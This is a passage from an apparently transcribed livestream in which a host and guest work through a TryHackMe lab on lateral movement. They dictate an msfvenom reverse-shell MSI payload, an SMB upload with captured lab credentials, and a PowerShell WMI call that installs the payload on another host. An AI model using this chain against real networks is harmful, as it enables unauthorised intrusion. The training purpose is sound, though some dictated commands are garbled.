the following command. Installing MSI packages through WMI. MSI is a file format used for installers. If we can copy an MSI package to the target system, we can then use WMI to attempt to install it for us. The file can be copied in any way available to the attacker. Once the MSI file is in the target system, we can attempt to install it by invoking the Win32 project class through WMI. We can achieve the same by using wmic and legacy systems. Okay, let's get to work. Let's do it. All right, we're already SSH. We can close out Leonard here. Interpreter, we can close this out. We'll probably have another one, so we'll just leave that open for now. What's this? That's our Python web shell. We don't need that right now either. Just kind of start fresh, start over. Go back to Jenna. Make sure we still have a connection. We do. All right. For this exercise, we'll assume we already captured some creds with administrative access. So another tier 1 admin, Kareem 1994, very strong password. We'll show you how to use these creds to move laterally to THMIS, the web server, using WMI and MSI packages. Cool. Feel free to try the other methods presented during this task. We will start by creating our MSI payload with msfvenom. Okay. From our attacker machine. Since you'll be sharing the lab with others, you'll want to use a different file name, of course. msfvenom-p, Windows x64, shell, reverse TCP, lhost, lateral movement, port. It looks like we're changing it up. 4445-f file type MSI, and we will call it hacksmarter.msi. Just gonna set this as well. That's what we set it to, right? Yep. Oh wait, no, we need to change the payload on that.
Yes, change that payload. I made that mistake and had a running payload that I couldn't use anymore, so it's very annoying.
Yeah, I caught that right when I hit run. Make sure I type that right. Yeah. There we go. Okay, we'll copy the payload using SMB again. There is our hacksmarter.msi. We'll copy the payload using SMB or any other method available. So we're putting the admin share again. So let's just do SMB client -c put hacked smarter .msi -u. We're using T1 Corrine Waters -wza.tryhackme.com. And then I'm going to specify the IP again just because that seems to work better. 10.200.80.201. And I believe it was just admin or something. Let's double check. Here we go. Yeah, oh, I had it slightly wrong there. Admin. Like that. And then it's gonna, we can type the password there, but it's gonna prompt us again. Corrine.1994. Since we are maybe I did something wrong there. Maybe I'm typing the IP wrong. Oh. Did my network break? 10.200.80.
Just hit refresh. I think your network might have stopped. If I look at that extend timer. Yeah, so just refresh it quickly, then the start button will be available again. I think you might have bricked it now by clicking extend when the network was offline.
Whoops. Let's see. We'll just see what happens. I'll give it a second.
I don't know if it's gonna work, but what you can do is you can try some lead hacking by doing inspect element and just enabling the start button and trying to press it and see if that will start your network. I don't know if it actually works if you press like extend and then after sort of the network has stopped. It's something that the front-end developers need to fix because it needs to update your user interface to show you that the network has stopped, which I don't think it does.
Sure. I mean, so, and I can't reset it, can I? Because you need 5 votes to reset it.
Sadly, yes. This is definitely a brick on the front end. Quickly, just to inspect elements on that button, I think I saw that disabled liner there that you can just remove and see what happens. I think it's like just double click that one and delete that entire thing. Let's enter and I'll press it. Okay, your network's starting. Let's hope it happens.
That's fantastic. I never would have thought to try that at all. We'll give it some time to do its thing. Can even just run a ping while we wait. And I guess what I could do is we have a little bit of time before our next 5-minute break, but this might take 5 minutes or so to launch up. So we're gonna take an early 5-minute break. I'll come back in 5 minutes and we'll see where things are at. It's actually almost midnight my time when I call it a day, but we'll see if we can make it through this next part. So I'm gonna take a quick 5-minute break. I'll come back in 5 minutes and we will see where things are at. So I shall be right back. Alright, what is up everyone? I am back after breaking my network. I think it still might be broken. Let's see.
Just quickly run a nmap of that host instead of a ping. I don't know if there might be a firewall that prevents the rest of it. And just do like...
oh yeah, -v.
Yeah, but -p for port 22. Okay, yeah, it's finding it open. So
we got
yeah,
it.
that little lead hack did actually work.
That is awesome. And we have to get signed back in for Jenna. It looks like, well, we can try this first that we were trying before. Here we go. Because this should still work. Hey. Okay, let's go ahead and throw this to the side, grab this. We'll go like that. I'm guessing we have to sign in as Jenna. So let's, well, we could sign in. All right, we're not taking a short break. We just took our short break. Scroll back down to where I was at. So we copied it to our admin share. We start a handler to handle that, which I did do that. Let's start a WMI session. So we're gonna start up PowerShell. So we're gonna SSH jenna.field@thmgmp2.za.tryhackme.com. Income 1982. All right. Get PowerShell open, and now we're just specifying everything that was up there. So username is going to be t1 corrine.waters. That password is going to be Corrine 1994. See if I mess up the syntax as I type it. Secure password equals convert to secure string password dash as plain text force. So far so good. New case sensitivity doesn't really matter. System dash management dash automation dash ps credential username secure password opt equals new CIM session option protocol. Oh, that just looked wrong to me. Ecom. Session equals new CIM session computer name. So I'm gonna grab the IP again. 10.200.80.201. Credential, our variable that we created, session option, other variable we created, error, action, stop. If I really typed all of that without a typo, I'm going to be in awe. We then invoke the install method from the Win32 product class to trigger the payload. Very interesting. Let's give it some time to do its thing. I got no errors. That's amazing. Especially at midnight. Invoke CIM method, CIM session, session class name, Win32, product, method name, install, arguments, package location equals C Windows called it hacksmarter.msi, I believe. Options equals, make sure I have the spaces correct here. I think I do. All users space equals space false, so we're not going to install on all users. Look at my syntax there. As a result, you see a connection. Okay. Did we trigger it right? Hey, hey. Doing good so far. Moving with WMI for fun. Heck yeah. What's this next one look like? Looks like a lot. Okay. Well, how much have we completed so far? We've done 4 tasks. We got 4 left. Look at that. I think that's a perfect spot to end part 1. And we'll finish up part 2 tomorrow. It is midnight where I am at. So for those of you watching Twitch, Discord, YouTube, hey, thank you seriously for hanging out. Amoeba Man, thank you again for joining. For those of you who follow us, Amoeba Man's been on quite a few helping us explain things, and we are going to on this confuses me when I look at my clock on midnight. It's kind of Tuesday for me, but on Thursday, so not tomorrow night, when I stream tomorrow night, I will finish this room. Hopefully we'll do part 2 and finish this room up. But then on Thursday evening, the plan is that Amoeba Man's going to join us, and he's going to walk us through spinning up our own Active Directory network for lab. Do I have that right, Amoeba Man? Any details you want to add there to my explanation?
No, basically just spinning up Active Directory labs using Vagrant, which is used for infrastructure as code. So it's something I use at TryHackMe and at my day job as well, because often we need networks to test or these type of things. So all of these networks were created by Vagrant. So you would have noticed in the networks there's a Vagrant user on all of those machines. And that's basically the provisioner, which is creating those machines for you. And once you sort of like have a baseline Vagrant thing running, you can run Vagrant up and then leave it for quite some time, and then it's just going to boot up your entire Active Directory network for you. So it's a nice way to create sort of like baseline templates for yourself that you can then use to modify to do whatever you want.
That is awesome, man. It's gonna be exciting to learn that. I have like a very small AD lab I made up with VirtualBox, but it was a lot of just manual labor and time to do that. So yeah, that'll be fun. So for those of you watching, join back Thursday evening around 10 p.m. Central Time. You can do the time translation, and we're gonna spend that stream doing that. And of course, as usual, it'll be recorded after the fact on Twitch as well as on YouTube, and I'll spam it out to the best of my ability elsewhere. So once again, for all those of you watching, thank you again for hanging out. Thank you for sticking through, and we will do part 2 tomorrow evening, same place, same time. I'll see you guys then.